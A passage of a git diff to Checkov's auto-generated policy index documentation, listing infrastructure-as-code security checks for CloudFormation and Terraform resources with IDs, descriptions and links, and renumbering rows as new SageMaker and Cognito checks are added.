[AppSyncProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/graph_checks/AppSyncProtectedByWAF.yaml) | +| 174 | CKV2_AWS_68 | resource | AWS::IAM::Role | Ensure SageMaker notebook instance IAM policy is not overly permissive | Cloudformation | [SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/graph_checks/SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml) | +| 175 | CKV2_AWS_68 | resource | AWS::SageMaker::NotebookInstance | Ensure SageMaker notebook instance IAM policy is not overly permissive | Cloudformation | [SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/graph_checks/SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml) | --- diff --git a/docs/5.Policy Index/serverless.md b/docs/5.Policy Index/serverless.md index c8304414c2d..ebe412568ca 100644 --- a/docs/5.Policy Index/serverless.md +++ b/docs/5.Policy Index/serverless.md 
@@ -170,25 +170,30 @@ nav_order: 1 | 149 | CKV_AWS_173 | resource | AWS::Lambda::Function | Check encryption settings for Lambda environment variable | Cloudformation | [LambdaEnvironmentEncryptionSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaEnvironmentEncryptionSettings.py) | | 150 | CKV_AWS_173 | resource | AWS::Serverless::Function | Check encryption settings for Lambda environment variable | Cloudformation | [LambdaEnvironmentEncryptionSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaEnvironmentEncryptionSettings.py) | | 151 | CKV_AWS_174 | resource | AWS::CloudFront::Distribution | Verify CloudFront Distribution Viewer Certificate is using TLS v1.2 | Cloudformation | [CloudFrontTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudFrontTLS12.py) | -| 152 | CKV_AWS_192 | resource | AWS::WAFv2::WebACL | Ensure WAF prevents message lookup in Log4j2. 
See CVE-2021-44228 aka log4jshell | Cloudformation | [WAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/WAFACLCVE202144228.py) | -| 153 | CKV_AWS_193 | resource | AWS::AppSync::GraphQLApi | Ensure AppSync has Logging enabled | Cloudformation | [AppSyncLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AppSyncLogging.py) | -| 154 | CKV_AWS_194 | resource | AWS::AppSync::GraphQLApi | Ensure AppSync has Field-Level logs enabled | Cloudformation | [AppSyncFieldLevelLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AppSyncFieldLevelLogs.py) | -| 155 | CKV_AWS_195 | resource | AWS::Glue::Crawler | Ensure Glue component has a security configuration associated | Cloudformation | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | -| 156 | CKV_AWS_195 | resource | AWS::Glue::DevEndpoint | Ensure Glue component has a security configuration associated | Cloudformation | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | -| 157 | CKV_AWS_195 | resource | AWS::Glue::Job | Ensure Glue component has a security configuration associated | Cloudformation | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | -| 158 | CKV_AWS_197 | resource | AWS::AmazonMQ::Broker | Ensure MQ Broker Audit logging is enabled | Cloudformation | [MQBrokerAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/MQBrokerAuditLogging.py) | -| 159 | CKV_AWS_258 | resource | AWS::Lambda::Url | Ensure that Lambda function URLs AuthType is 
not None | Cloudformation | [LambdaFunctionURLAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaFunctionURLAuth.py) | -| 160 | CKV_AWS_260 | resource | AWS::EC2::SecurityGroup | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80 | Cloudformation | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py) | -| 161 | CKV_AWS_260 | resource | AWS::EC2::SecurityGroupIngress | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80 | Cloudformation | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py) | -| 162 | CKV_AWS_291 | resource | AWS::MSK::Cluster | Ensure MSK nodes are private | Cloudformation | [MSKClusterNodesArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/MSKClusterNodesArePrivate.py) | -| 163 | CKV_AWS_317 | resource | AWS::Elasticsearch::Domain | Ensure Elasticsearch Domain Audit Logging is enabled | Cloudformation | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainAuditLogging.py) | -| 164 | CKV_AWS_317 | resource | AWS::OpenSearchService::Domain | Ensure Elasticsearch Domain Audit Logging is enabled | Cloudformation | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainAuditLogging.py) | -| 165 | CKV_AWS_360 | resource | AWS::DocDB::DBCluster | Ensure DocumentDB has an adequate backup retention period | Cloudformation | [DocDBBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBBackupRetention.py) | -| 166 | CKV_AWS_361 | 
resource | AWS::Neptune::DBCluster | Ensure that Neptune DB cluster has automated backups enabled with adequate retention | Cloudformation | [NeptuneClusterBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/NeptuneClusterBackupRetention.py) | -| 167 | CKV_AWS_363 | resource | AWS::Lambda::Function | Ensure Lambda Runtime is not deprecated | Cloudformation | [DeprecatedLambdaRuntime.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DeprecatedLambdaRuntime.py) | -| 168 | CKV_AWS_363 | resource | AWS::Serverless::Function | Ensure Lambda Runtime is not deprecated | Cloudformation | [DeprecatedLambdaRuntime.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DeprecatedLambdaRuntime.py) | -| 169 | CKV_AWS_364 | resource | AWS::Lambda::Permission | Ensure that AWS Lambda function permissions delegated to AWS services are limited by SourceArn or SourceAccount | Cloudformation | [LambdaServicePermission.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaServicePermission.py) | -| 170 | CKV2_AWS_33 | resource | AWS::AppSync::GraphQLApi | Ensure AppSync is protected by WAF | Cloudformation | [AppSyncProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/graph_checks/AppSyncProtectedByWAF.yaml) | +| 152 | CKV_AWS_187 | resource | AWS::SageMaker::Domain | Ensure Sagemaker domain and notebook instance are encrypted by KMS using a customer managed Key (CMK) | Cloudformation | [SagemakerNotebookEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SagemakerNotebookEncryptedWithCMK.py) | +| 153 | CKV_AWS_187 | resource | AWS::SageMaker::NotebookInstance | Ensure Sagemaker domain and notebook instance are encrypted by KMS using a customer managed Key (CMK) | Cloudformation | 
[SagemakerNotebookEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SagemakerNotebookEncryptedWithCMK.py) | +| 154 | CKV_AWS_192 | resource | AWS::WAFv2::WebACL | Ensure WAF prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell | Cloudformation | [WAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/WAFACLCVE202144228.py) | +| 155 | CKV_AWS_193 | resource | AWS::AppSync::GraphQLApi | Ensure AppSync has Logging enabled | Cloudformation | [AppSyncLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AppSyncLogging.py) | +| 156 | CKV_AWS_194 | resource | AWS::AppSync::GraphQLApi | Ensure AppSync has Field-Level logs enabled | Cloudformation | [AppSyncFieldLevelLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AppSyncFieldLevelLogs.py) | +| 157 | CKV_AWS_195 | resource | AWS::Glue::Crawler | Ensure Glue component has a security configuration associated | Cloudformation | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | +| 158 | CKV_AWS_195 | resource | AWS::Glue::DevEndpoint | Ensure Glue component has a security configuration associated | Cloudformation | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | +| 159 | CKV_AWS_195 | resource | AWS::Glue::Job | Ensure Glue component has a security configuration associated | Cloudformation | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | +| 160 | CKV_AWS_197 | resource | AWS::AmazonMQ::Broker | Ensure MQ Broker Audit logging is 
enabled | Cloudformation | [MQBrokerAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/MQBrokerAuditLogging.py) | +| 161 | CKV_AWS_258 | resource | AWS::Lambda::Url | Ensure that Lambda function URLs AuthType is not None | Cloudformation | [LambdaFunctionURLAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaFunctionURLAuth.py) | +| 162 | CKV_AWS_260 | resource | AWS::EC2::SecurityGroup | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80 | Cloudformation | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py) | +| 163 | CKV_AWS_260 | resource | AWS::EC2::SecurityGroupIngress | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80 | Cloudformation | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py) | +| 164 | CKV_AWS_291 | resource | AWS::MSK::Cluster | Ensure MSK nodes are private | Cloudformation | [MSKClusterNodesArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/MSKClusterNodesArePrivate.py) | +| 165 | CKV_AWS_317 | resource | AWS::Elasticsearch::Domain | Ensure Elasticsearch Domain Audit Logging is enabled | Cloudformation | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainAuditLogging.py) | +| 166 | CKV_AWS_317 | resource | AWS::OpenSearchService::Domain | Ensure Elasticsearch Domain Audit Logging is enabled | Cloudformation | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainAuditLogging.py) | +| 167 | CKV_AWS_360 | resource | 
AWS::DocDB::DBCluster | Ensure DocumentDB has an adequate backup retention period | Cloudformation | [DocDBBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBBackupRetention.py) | +| 168 | CKV_AWS_361 | resource | AWS::Neptune::DBCluster | Ensure that Neptune DB cluster has automated backups enabled with adequate retention | Cloudformation | [NeptuneClusterBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/NeptuneClusterBackupRetention.py) | +| 169 | CKV_AWS_363 | resource | AWS::Lambda::Function | Ensure Lambda Runtime is not deprecated | Cloudformation | [DeprecatedLambdaRuntime.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DeprecatedLambdaRuntime.py) | +| 170 | CKV_AWS_363 | resource | AWS::Serverless::Function | Ensure Lambda Runtime is not deprecated | Cloudformation | [DeprecatedLambdaRuntime.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DeprecatedLambdaRuntime.py) | +| 171 | CKV_AWS_364 | resource | AWS::Lambda::Permission | Ensure that AWS Lambda function permissions delegated to AWS services are limited by SourceArn or SourceAccount | Cloudformation | [LambdaServicePermission.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaServicePermission.py) | +| 172 | CKV_AWS_366 | resource | AWS::Cognito::IdentityPool | Ensure AWS Cognito identity pool does not allow unauthenticated guest access | Cloudformation | [CognitoUnauthenticatedIdentities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CognitoUnauthenticatedIdentities.py) | +| 173 | CKV2_AWS_33 | resource | AWS::AppSync::GraphQLApi | Ensure AppSync is protected by WAF | Cloudformation | 
[AppSyncProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/graph_checks/AppSyncProtectedByWAF.yaml) | +| 174 | CKV2_AWS_68 | resource | AWS::IAM::Role | Ensure SageMaker notebook instance IAM policy is not overly permissive | Cloudformation | [SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/graph_checks/SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml) | +| 175 | CKV2_AWS_68 | resource | AWS::SageMaker::NotebookInstance | Ensure SageMaker notebook instance IAM policy is not overly permissive | Cloudformation | [SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/graph_checks/SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml) | --- diff --git a/docs/5.Policy Index/terraform.md b/docs/5.Policy Index/terraform.md index 126851dff00..85bca75d135 100644 --- a/docs/5.Policy Index/terraform.md +++ b/docs/5.Policy Index/terraform.md 
@@ -6,2122 +6,2136 @@ nav_order: 1 # terraform resource scans (auto generated) -| | Id | Type | Entity | Policy | IaC | Resource Link | -|------|-----------------|----------|---------------------------------------------------------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|-----------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| 0 | CKV2_ADO_1 | resource | azuredevops_branch_policy_min_reviewers | Ensure at least two approving reviews for PRs | Terraform | [ADORepositoryHasMinTwoReviewers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azuredevops/ADORepositoryHasMinTwoReviewers.yaml) | -| 1 | CKV2_ADO_1 | resource | azuredevops_git_repository | Ensure at least two approving reviews for PRs | Terraform | [ADORepositoryHasMinTwoReviewers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azuredevops/ADORepositoryHasMinTwoReviewers.yaml) | -| 2 | CKV_ALI_1 | resource | alicloud_oss_bucket | Alibaba Cloud OSS bucket accessible to public | Terraform | [OSSBucketPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketPublic.py) | -| 3 | CKV_ALI_2 | resource | alicloud_security_group_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/SecurityGroupUnrestrictedIngress22.py) | -| 4 | CKV_ALI_3 | resource | alicloud_security_group_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 | Terraform | 
[SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/SecurityGroupUnrestrictedIngress3389.py) | -| 5 | CKV_ALI_4 | resource | alicloud_actiontrail_trail | Ensure Action Trail Logging for all regions | Terraform | [ActionTrailLogAllRegions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/ActionTrailLogAllRegions.py) | -| 6 | CKV_ALI_5 | resource | alicloud_actiontrail_trail | Ensure Action Trail Logging for all events | Terraform | [ActionTrailLogAllEvents.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/ActionTrailLogAllEvents.py) | -| 7 | CKV_ALI_6 | resource | alicloud_oss_bucket | Ensure OSS bucket is encrypted with Customer Master Key | Terraform | [OSSBucketEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketEncryptedWithCMK.py) | -| 8 | CKV_ALI_7 | resource | alicloud_disk | Ensure disk is encrypted | Terraform | [DiskIsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/DiskIsEncrypted.py) | -| 9 | CKV_ALI_8 | resource | alicloud_disk | Ensure Disk is encrypted with Customer Master Key | Terraform | [DiskEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/DiskEncryptedWithCMK.py) | -| 10 | CKV_ALI_9 | resource | alicloud_db_instance | Ensure database instance is not public | Terraform | [RDSIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSIsPublic.py) | -| 11 | CKV_ALI_10 | resource | alicloud_oss_bucket | Ensure OSS bucket has versioning enabled | Terraform | [OSSBucketVersioning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketVersioning.py) | -| 12 | CKV_ALI_11 | resource | 
alicloud_oss_bucket | Ensure OSS bucket has transfer Acceleration enabled | Terraform | [OSSBucketTransferAcceleration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketTransferAcceleration.py) | -| 13 | CKV_ALI_12 | resource | alicloud_oss_bucket | Ensure the OSS bucket has access logging enabled | Terraform | [OSSBucketAccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketAccessLogs.py) | -| 14 | CKV_ALI_13 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy requires minimum length of 14 or greater | Terraform | [RAMPasswordPolicyLength.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyLength.py) | -| 15 | CKV_ALI_14 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy requires at least one number | Terraform | [RAMPasswordPolicyNumber.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyNumber.py) | -| 16 | CKV_ALI_15 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy requires at least one symbol | Terraform | [RAMPasswordPolicySymbol.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicySymbol.py) | -| 17 | CKV_ALI_16 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy expires passwords within 90 days or less | Terraform | [RAMPasswordPolicyExpiration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyExpiration.py) | -| 18 | CKV_ALI_17 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy requires at least one lowercase letter | Terraform | 
[RAMPasswordPolicyLowercaseLetter.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyLowercaseLetter.py) | -| 19 | CKV_ALI_18 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy prevents password reuse | Terraform | [RAMPasswordPolicyReuse.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyReuse.py) | -| 20 | CKV_ALI_19 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy requires at least one uppercase letter | Terraform | [RAMPasswordPolicyUppcaseLetter.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyUppcaseLetter.py) | -| 21 | CKV_ALI_20 | resource | alicloud_db_instance | Ensure RDS instance uses SSL | Terraform | [RDSInstanceSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceSSL.py) | -| 22 | CKV_ALI_21 | resource | alicloud_api_gateway_api | Ensure API Gateway API Protocol HTTPS | Terraform | [APIGatewayProtocolHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/APIGatewayProtocolHTTPS.py) | -| 23 | CKV_ALI_22 | resource | alicloud_db_instance | Ensure Transparent Data Encryption is Enabled on instance | Terraform | [RDSTransparentDataEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSTransparentDataEncryptionEnabled.py) | -| 24 | CKV_ALI_23 | resource | alicloud_ram_account_password_policy | Ensure Ram Account Password Policy Max Login Attempts not > 5 | Terraform | [RAMPasswordPolicyMaxLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyMaxLogin.py) | -| 25 | CKV_ALI_24 | resource | alicloud_ram_security_preference | Ensure RAM enforces MFA | Terraform | 
[RAMSecurityEnforceMFA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMSecurityEnforceMFA.py) | -| 26 | CKV_ALI_25 | resource | alicloud_db_instance | Ensure RDS Instance SQL Collector Retention Period should be greater than 180 | Terraform | [RDSRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSRetention.py) | -| 27 | CKV_ALI_26 | resource | alicloud_cs_kubernetes | Ensure Kubernetes installs plugin Terway or Flannel to support standard policies | Terraform | [K8sEnableNetworkPolicies.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/K8sEnableNetworkPolicies.py) | -| 28 | CKV_ALI_27 | resource | alicloud_kms_key | Ensure KMS Key Rotation is enabled | Terraform | [KMSKeyRotationIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/KMSKeyRotationIsEnabled.py) | -| 29 | CKV_ALI_28 | resource | alicloud_kms_key | Ensure KMS Keys are enabled | Terraform | [KMSKeyIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/KMSKeyIsEnabled.py) | -| 30 | CKV_ALI_29 | resource | alicloud_alb_acl_entry_attachment | Alibaba ALB ACL does not restrict Access | Terraform | [ALBACLIsUnrestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/ALBACLIsUnrestricted.py) | -| 31 | CKV_ALI_30 | resource | alicloud_db_instance | Ensure RDS instance auto upgrades for minor versions | Terraform | [RDSInstanceAutoUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceAutoUpgrade.py) | -| 32 | CKV_ALI_31 | resource | alicloud_cs_kubernetes_node_pool | Ensure K8s nodepools are set to auto repair | Terraform | 
[K8sNodePoolAutoRepair.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/K8sNodePoolAutoRepair.py) | -| 33 | CKV_ALI_32 | resource | alicloud_ecs_launch_template | Ensure launch template data disks are encrypted | Terraform | [LaunchTemplateDisksAreEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/LaunchTemplateDisksAreEncrypted.py) | -| 34 | CKV_ALI_33 | resource | alicloud_slb_tls_cipher_policy | Alibaba Cloud Cypher Policy are secure | Terraform | [TLSPoliciesAreSecure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/TLSPoliciesAreSecure.py) | -| 35 | CKV_ALI_35 | resource | alicloud_db_instance | Ensure RDS instance has log_duration enabled | Terraform | [RDSInstanceLogsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceLogsEnabled.py) | -| 36 | CKV_ALI_36 | resource | alicloud_db_instance | Ensure RDS instance has log_disconnections enabled | Terraform | [RDSInstanceLogDisconnections.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceLogDisconnections.py) | -| 37 | CKV_ALI_37 | resource | alicloud_db_instance | Ensure RDS instance has log_connections enabled | Terraform | [RDSInstanceLogConnections.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceLogConnections.py) | -| 38 | CKV_ALI_38 | resource | alicloud_log_audit | Ensure log audit is enabled for RDS | Terraform | [LogAuditRDSEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/LogAuditRDSEnabled.py) | -| 39 | CKV_ALI_41 | resource | alicloud_mongodb_instance | Ensure MongoDB is deployed inside a VPC | Terraform | 
[MongoDBInsideVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/MongoDBInsideVPC.py) | -| 40 | CKV_ALI_42 | resource | alicloud_mongodb_instance | Ensure Mongodb instance uses SSL | Terraform | [MongoDBInstanceSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/MongoDBInstanceSSL.py) | -| 41 | CKV_ALI_43 | resource | alicloud_mongodb_instance | Ensure MongoDB instance is not public | Terraform | [MongoDBIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/MongoDBIsPublic.py) | -| 42 | CKV_ALI_44 | resource | alicloud_mongodb_instance | Ensure MongoDB has Transparent Data Encryption Enabled | Terraform | [MongoDBTransparentDataEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/MongoDBTransparentDataEncryptionEnabled.py) | -| 43 | CKV_AWS_1 | data | aws_iam_policy_document | Ensure IAM policies that allow full "*-*" administrative privileges are not created | Terraform | [AdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/AdminPolicyDocument.py) | -| 44 | CKV_AWS_2 | resource | aws_alb_listener | Ensure ALB protocol is HTTPS | Terraform | [ALBListenerHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBListenerHTTPS.py) | -| 45 | CKV_AWS_2 | resource | aws_lb_listener | Ensure ALB protocol is HTTPS | Terraform | [ALBListenerHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBListenerHTTPS.py) | -| 46 | CKV_AWS_3 | resource | aws_ebs_volume | Ensure all data stored in the EBS is securely encrypted | Terraform | [EBSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EBSEncryption.py) | -| 47 | CKV_AWS_5 | resource | aws_elasticsearch_domain | Ensure all 
data stored in the Elasticsearch is securely encrypted at rest | Terraform | [ElasticsearchEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchEncryption.py) | -| 48 | CKV_AWS_5 | resource | aws_opensearch_domain | Ensure all data stored in the Elasticsearch is securely encrypted at rest | Terraform | [ElasticsearchEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchEncryption.py) | -| 49 | CKV_AWS_6 | resource | aws_elasticsearch_domain | Ensure all Elasticsearch has node-to-node encryption enabled | Terraform | [ElasticsearchNodeToNodeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchNodeToNodeEncryption.py) | -| 50 | CKV_AWS_6 | resource | aws_opensearch_domain | Ensure all Elasticsearch has node-to-node encryption enabled | Terraform | [ElasticsearchNodeToNodeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchNodeToNodeEncryption.py) | -| 51 | CKV_AWS_7 | resource | aws_kms_key | Ensure rotation for customer created CMKs is enabled | Terraform | [KMSRotation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KMSRotation.py) | -| 52 | CKV_AWS_8 | resource | aws_instance | Ensure all data stored in the Launch configuration or instance Elastic Blocks Store is securely encrypted | Terraform | [LaunchConfigurationEBSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LaunchConfigurationEBSEncryption.py) | -| 53 | CKV_AWS_8 | resource | aws_launch_configuration | Ensure all data stored in the Launch configuration or instance Elastic Blocks Store is securely encrypted | Terraform | 
